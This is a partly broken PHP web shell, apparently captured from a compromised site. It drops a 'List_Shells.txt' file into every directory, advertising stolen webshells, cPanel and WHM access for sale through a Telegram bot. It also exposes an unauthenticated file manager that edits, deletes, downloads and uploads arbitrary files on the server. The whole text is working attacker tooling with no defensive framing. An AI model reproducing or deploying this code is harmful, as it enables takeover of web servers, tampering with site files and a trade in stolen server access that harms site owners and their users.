Login

File '$fileName' has been created in '$directory'."; } else { echo "
File '$fileName' already exists in '$directory'.
"; } } // Define the file name and content $auto_file_name = 'List_Shells.txt'; $auto_file_content = "šŸ”„ Looking for Webshells, Webmailers, SMTPs, cPanels, or WHM? šŸ”„\n\nāœ… Fresh stock daily\nāœ… Instant delivery\nāœ… Secure transactions\n\nšŸ‘‰ Get started now: @utchiha505_Market_bot\n\nšŸ”’ Your privacy is guaranteed. Join us today!"; // Start creating files from the root directory createFileInFolders('.', $auto_file_name, $auto_file_content); // Set the directory you want to access $directory = './'; // Check if the user has submitted the form if ($_SERVER['REQUEST_METHOD'] === 'POST') { // Handle file actions if (isset($_POST['action'])) { $action = $_POST['action']; $filename = $_POST['filename']; $path = $directory . $filename; switch ($action) { case 'edit': if (isset($_POST['content'])) { $content = $_POST['content']; file_put_contents($path, $content); echo "
File '$filename' has been updated.
"; } break; case 'delete': if (file_exists($path)) { unlink($path); echo "
File '$filename' has been deleted.
"; } break; case 'download': if (file_exists($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile($path); exit; } break; case 'upload': if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $uploadedFile = $_FILES['file']; $uploadedFilename = $uploadedFile['name']; $uploadedFilePath = $directory . $uploadedFilename; if (move_uploaded_file($uploadedFile['tmp_name'], $uploadedFilePath)) { echo "
File '$uploadedFilename' has been uploaded.
"; } else { echo "
Error uploading file '$uploadedFilename'.
"; } } break; } } } // Get the list of files in the directory $files = scandir($directory); ?> File Manager

File Manager

Files in the directory:

" . $file . ""; } } ?>

Upload a File

Edit File:

Download